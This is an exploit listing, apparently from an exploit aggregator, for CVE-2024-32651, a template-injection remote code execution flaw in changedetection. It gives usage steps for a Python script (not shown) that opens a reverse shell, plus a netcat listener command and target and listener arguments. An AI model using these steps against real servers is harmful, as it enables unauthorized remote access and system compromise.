Share
## https://sploitus.com/exploit?id=E4C8D3D0-D53C-534C-83C2-2761BDE69F2C
# CVE-2024-32651 changedetection < 0.45.20 - Remote Code Execution (RCE)

Server-Side Template Injection Exploit!!
## 1. Title
Remote Code Execution via Server-Side Template Injection (SSTI) in Vulnerable Web Application

## 2. Description
This exploit targets a web application vulnerable to Server-Side Template Injection (SSTI). By exploiting this vulnerability, an attacker can execute arbitrary commands on the server. The provided Python script automates the exploitation process by submitting a payload that triggers a reverse shell.

## 3. Vulnerability Information
1. **CVE ID:** CVE-2024-32651
2. **Affected Systems:** Web applications that use Server-Side Template Injection (SSTI) and have a vulnerable configuration.

## 4. Proof of Concept
To reproduce the vulnerability, execute the provided Python script against the vulnerable web application. Ensure that you have a listener (e.g., `nc -lvp 9999`) running to capture the reverse shell connection.

## 5. Usage
1. **Save the script** to a file named `CVE-2024-32651.py`.

2. **Install the required Python libraries** if not already installed:
   ```bash
   pip install requests beautifulsoup4

3.  To use the script, provide the following command-line arguments:
- `--url`: **Base URL of the vulnerable web application** (e.g., `http://10.10.10.10:5000`).
- `--port`: **Port for the listener** (e.g., `9999`).
- `--ip`: **IP address of the listener** (e.g., `10.10.50.22`).
- `--notification`: *(Optional)* **Notification URL** if you want to use a specific notification URL.
- 
4. **Run the script** using Python 3 with the required arguments. The syntax is:
   ```bash
   python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]

## 6. Credits
This fixed version of the exploit was based on an original exploit published by Zach Crosman (zcrosman) with EDB-ID: 52027. You can view the original exploit [here](https://www.exploit-db.com/exploits/52027).
I  thank Zach Crosman for his contribution to the security community.